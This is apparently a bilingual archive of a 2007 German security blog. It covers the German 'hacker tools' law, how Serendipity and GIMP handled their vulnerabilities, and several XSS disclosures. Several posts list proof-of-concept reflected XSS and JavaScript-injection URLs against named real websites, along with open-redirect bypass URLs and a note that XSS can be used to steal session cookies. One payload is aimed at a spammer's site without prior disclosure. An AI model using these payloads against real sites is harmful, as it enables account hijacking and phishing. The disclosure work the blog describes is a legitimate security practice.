Security - 7

Der Bundesrat hat heute das obskure Verbot von »Hacktools« abgesegnet. Wohl ohne großen Widerstand, wiewohl praktisch jeder, der sich auch nur ansatzweise damit auskennt, das ganze für völlig absurd halten muss. In seltener Einigkeit warnen vom CCC über die GI bis zur Bitkom alle vor dem Gesetzeswerk.

Aber weswegen ich das hier schreibe: Die tagesschau erklärt das ganze sehr brauchbar, was ich dachte, dass ich doch mal lobend erwähnen kann. Vielleicht ein kleiner Beitrag, dass auch nicht-Techies derartiges besser verstehen.

I recently wrote that I'm sometimes a bit unhappy how security issues are handled in free software project.

Now, to have some contrast, today I'll talk about an example how to do it right. Serendipity, the software I'm using to host this blog, had an SQL injection vulnerability. On the same day, they announced it and provide updated packages. The finder of the vulnerability is also mentioned. Now, it is only able to get password-hashes, many other projects probably would've treated this vulnerability as »low-impact« or something like that.
But beside that, they also provide some tipps how to check if the vulnerability has already been exploitet and suggest to change user passwords.

A while back, there was another vulnerability reported in serendipity. The authors said they don't think that it's really a vulnerability and it probably can't be used for anything evil. But anyway, an update was released and announced just to be sure.

Now, that's good security-work. The fact that serendipity has very few vulnerabilities at all already is very good. The fact they treat the few ones proper is even better. Some other projects should have a look at that.

It's an often told story that the free software community cares more about security. That it's much better because everyone can look at the code. While this may sometimes be true and I know many free software projects really care about security issues, often enough it's the exact opposite.

On 26.04., some guy called Marsu released an advisory about the GIMP. Loading files in the sunras-format can lead to a buffer overflow. Now, while it was silently fixed in svn, for a month they didn't put an advisory on their page and they didn't provide an update. Even with the release of new versions (2.2.15, 2.3.17), they somehow »forgot« to mention that it was a security-update.
Now, after looking into the NEWS-file (which is their Changelog), for 2.2.15 there's this little line:
- guard against a possible stack overflow in the Sunras loader (bug #433902)
They didn't mention the word »security«, they didn't give credits to Marsu, they didn't provide a reference to the advisory or the CVE-ID. Now, even worse, for 2.3.17, they forgot to mention that bug at all (it's probably part of the mentioned »lots of bug fixes«).

Now one might say this isn't that critical, because who uses sunras (I also never heared of that format before)? But think about this: I could mail someone a crafted sunras-file, saying it's an old image I found on some backup HD, together with the note that gimp can open it. I think it's not unlikely that someone might open it, especially with some intelligent social engineering. Beside that, EVERY SINGLE security bug should be taken serious.

Now, don't take me wrong. I love the GIMP, it's a great application. I also think that free software is an important precondition for secure software. But it's not the only thing. And as long as many people in the free software community treat security bugs like this, it's no better than those in the proprietary world.

Es scheint heutzutage mehr und mehr zur Selbstverständlichkeit zu werden, dass immer dann, wenn Politik sich »mit Computern« beschäftigt, vor allem die sich besonders laut hervortun, die gleichzeitig unmißverständlich klarstellen, dass sie vom Thema eigentlich garkeine Ahnung haben. Das haben Schäuble und Zielke bei der Debatte um den »Bundestrojaner« nur allzu deutlich getan, das zeigt sich auch bei der unsäglichen Debatte um sogenannte Killerspiele.

Und in dieser Tradition geriert sich auch das heute beschlossene Gesetzeswerk zur Bekämpfung der Computerkriminalität. »Hacktools« werden verboten.

Frage 1: What the hell is a hacker?
Es gehört wohl zu einer der Fragen, bei der 5 Fachleute mindestens 7 Meinungen haben. Das reicht vom Verständnis des Hackers als jemandem, der sich kreativ-spielerisch mit Technologie außeinandersetzt über die Unterscheindung in White- und Blackhats (bzw. Hacker und Cracker) bis hin zum populären Verständnis des bebrillten Jugendlichen, der NASA-Rechner hackt, dazwischen in den verschiedensten Schattierungen der revolutionäre Kämpfer für Informationsfreiheit (23).
Ein solcher Begriff, sollte man meinen, ist wohl denkbar ungeeignet, um in einem Gesetzeswerk aufzutauchen.

Frage 2: Und was ist jetzt eigentlich ein »Hacktool«?
Nehmen wir großzügigerweise an, es handle sich um die Vorstellung des Hackers als jemandem, der illegal in Rechner eindringt, sich Daten beschafft und Webseiten verändert. Nun wird auch noch erläutert, "Der Gesetzgeber wird die Auswirkungen der neuen Strafvorschriften genau zu beobachten haben. Sollten doch Programmentwickler und Firrmen, die nicht aus krimineller Energie heraus handeln, durch diese neuen Strafvorschriften in Ermittlungsverfahren einbezogen werden, wird auf solche Entwicklungen zeitnah reagiert werden müssen."
Das beruhigt ungemein. Letztendlich ist wohl zu erwarten, dass es Sache der Gerichte bleibt, zu entscheiden, ob nun der Austausch von Trojanern und Viren zum Zwecke der Sicherheitsforschung darunter fällt, ob ein Tool wie Nessus oder johntheripper schon kriminelle Energie impliziert.
<Sarkasmus>Bekanntlich erwiesen sich deutsche Gerichte in der Vergangenheit immer besonders kompetent und informiert, wenn es um die Beurteilung von derartigen Fragen ging.</Sarkasmus>

Desweiteren sei als interessante Sidenote noch bemerkt, dass auch die »Bürgerrechtsparteien« FDP und Grüne geschlossen für den Entwurf stimmten. Lediglich der SPDler Jörg Tauss gab sich als Dissident gegen den Fraktionszwang und votierte mit der Linkspartei dagegen.

09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
is all I have to say today.

Gestern in Frankfurt, zu nerdfreundlicher Zeit um 15 Uhr, ging's los.

1000 bis 2000 Menschen (je nachdem ob man Veranstalter oder Polizei fragt). Der Optimist würde wohl sagen, angesichts der allgemeinen Ignoranz gegenüber dem Thema, insbesondere auch in linken Kreisen, immerhin etwas, der Pessimist dass es angesichts der Dringlichkeit der angesprochenen Themen viel zu wenige sind. Ich positionier mich mal irgendwo dazwischen ;-)

Weitere Aktivitäten beim AK Vorratsdatenspeicherung, und die Demo hat's immerhin auf die Webseite der tagesschau geschafft.

Now, once another episode of cross site scripting disclosure. This time we have some free software web applications. Sadly, none of them was able to provide a fix in a decent timeframe.

CVE-2007-1871 XSS in chcounter
CVE-2007-1872 XSS in toendaCMS
CVE-2007-1873 XSS in mephisto

It's terrifying how many sites there are out there with XSS-issues.

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>

Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters.

Napster and MPAA still unfixed.

Folgende Nachricht schrieb ich an den Support von Napster (das ist dieser DRM-Shop, hervorgegangen aus dem Label eines längst vergessenen Projekts):

Folgende, überaus kompetente Antwort erhielt ich:

Ich wusste doch immer dass die von der Filmindustrie das mit dem Internetz nicht verstanden haben:

Note: This is just a short form of a german article I posted today. E-Plus is a big german mobile telephony provider. I've found a bunch of XSS together with Alexander Brachmann (responsible disclosure, all reported to E-Plus before, probably more to come).

For my english visitors, here are the urls:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('

Already fixed ones:
http://www.eplus.de/frame.asp?go=http://www.google.de/
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com

Von XSS (Cross Site Scripting) spricht man, wenn es durch Usereingaben möglich ist, bei einer Seite eigenen HTML und JavaScript-Code einzufügen. Das ist insbesondere dann ein Problem, wenn die Seite (auf der selben Domain reicht) in irgendeiner Weise Sessions und Accounts nutzt. Warum? Weil es trivial möglich ist, mit etwas JavaScript-Code das Session-Cookie zu übertragen und somit den Account zu hijacken.

Ein simples Beispiel:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>

Durch die bloße Eingabe von "><script>alert(1)</script> oder <script>alert(1)</script> lässt sich jedes Formular auf triviale XSS-Probleme checken (einfach mal ausprobieren).

Problemfall Frames: Aufgrund der Tatsache, dass ein bestimmter Framezustand nicht in einer URL festhaltbar ist, haben sich viele Menschen mehr oder weniger sinnvolle Fakes ausgedacht, die dann häufig in der Form http://mydomain.com/framescript?location=siteinframe daherkommen.
Nun kann man sowas ausnutzen, um in einem Frame eine Fremdseite darzustellen. Bis vor kurzem funktionierte dies noch:
http://www.eplus-unternehmen.de/frame.asp?go=http://www.google.de/
Kurze Zeit später wurde selbiges gefiltert, mit folgendem kam man aber immer noch weiter:
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com
Gehen inzwischen alle nicht mehr.
Problem? Phishing. Funktioniert selbiges bei einer Bank oder einem sonstigen Unternehmen, bei dem größere Beträge eine Rolle spielen, ist es für Phisher attraktiv, unbedarften Menschen eine Nachricht zu schicken, die eine echt aussehende URL des Unternehmens enthält.

Was bei obriger URL nach wie vor funktioniert, ist eine etwas trickreichere JavaScript-Injection:
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('
Das schöne hierbei ist, dass die Variable direkt in bereits bestehenden JavaScript-Code eingefügt wird.

Desweiteren hat eplus noch mehr Domains und anderswo funktioniert es noch:
http://www.eplus-unlimited.de/3_1_jingles/index.jsp?toLoad=http://www.google.de//

E-Plus wurde vor über einem Monat mit den ersten Lücken kontaktiert. Die Schließung erfolgte schleppend, weswegen mir die Veröffentlichung hier angemessen erscheint. Die Veröffentlichung wurde vor einer Woche angekündigt. Es wurden keine Lücken publiziert, von denen E-Plus nicht schon mindestens vor einer Woche bescheid wusste.

Credits gehen vor allem an Alexander Brachmann.

In aller Regel betreibe ich Responsible Disclosure: Vor einer öffentlichen Publizierung wird der Anbieter oder Autor der Software mit Vorlauf informiert.

Heut abend beim Webmontag gibt's ne Kurz-Präsentation.

Ich hab zwar keine Ahnung, was OKTE ist oder was die anbieten, aber die haben mir gerade Spam geschickt.

Sidenote:
okte.cn/user.asp?n="><script>alert(1)</script>

(Copy & Paste bitte, ich hoffe, dass das so deren Pagerank nicht positiv beeinflußt)

No responsible disclosure for spammers!

We got a huge trackback spam DDoS the last days that caused our servers to be unavailable for some hours. Most probably caused by some botnet. That's really a pain, you're so defenseless against that kind of threat. Filtering them is like trying to stop ants from entering your house by closing their entrance holes.
But anyway, I decided to write some abuse-mails to the contacts of some of the source IPs. I even got ONE reply (from Neighbourhood Cable, if you're looking for an ISP in australia, have a look at them, they must be good). I also got this:

<k55k559@bora.net|/webmail/mbox5/bora.net/961/k55k559|2|204800|209715200|99999999|99999999|>:
Recipient's maiilbox is full, message returned to sender, (#5.2.2) [7mallot:(209715200), usage:(209874944) [0m

<saehym@bora.net|/webmail/mbox0/bora.net/865/saehym|2|51200|58454016|99999999|99999999|>:
Recipient's maiilbox is full, message returned to sender, (#5.2.2) [7mallot:(52428800), usage:(58474496) [0m

Now, who in the world gives IPs out to people who aren't able to configure their mailboxes? Boranet, the source of that, seems to belong to the company LG, also producing Hardware. Maybe an interesting fact when you buy your next CD burner.

Die Diskussion zum Bundestrojaner schlägt ja grad ziemliche Wellen. Ich versuch mir grad vorzustellen, wie das eigentlich in der Praxis aussieht.

Ich meine, wir ham ja gewisse Unterschiede zu »normalen« Hausdurchsuchungen. Physikalische Sicherheitsmechanismen (Türen, Schlösser) haben ja qua Design immer gewisse umgehungsmöglichkeiten, im Zweifel rohe Gewalt. Bei elektronischen verhält sich's da ja ein bißchen anders. Zwar ist es bekanntermaßen so, dass wir's bei allen real existierenden Betriebssystemen mit so vielen Sicherheitslücken zu tun haben, dass ein »echter Hacker« (tm) immer sagen würde, wenn man unbedingt rein will, geht irgendwas, aber vorgesehen ist das ja nicht unbedingt so.

Ich stell mir da zum Beispiel folgende Fragen:
- Kriegen Antiviren-Firmen dann Post vom BKA mit einer Liste von Schadsoftware, die sie bitte unbehelligt lassen sollen? Wann gibt's die erste Klage gegen einen Hersteller von Security-Software wegen Behinderung von Strafverfolgung?
- Kriegt Microsoft Post vom BKA, welche Sicherheitslücken einen Patchday länger überleben sollen?
- Steigt die Bundesregierung in den Handel mit 0-day-Exploits ein? (Ohne mich da genauer auszukennen, aber ich würde ja vermuten, dass man es da ziemlich schnell mit eher mafiosen Strukturen zu tun hat)

Ich vermute ja stark, die Antwort ist im Moment vor allem, dass die Leute, die sich das ausgedacht haben, einfach keine Ahnung von der Sache haben (wer sich davon überzeugen mag, Wolfgang Schäuble im taz-Interview). Aber da tun sich schon spannende Fragen auf.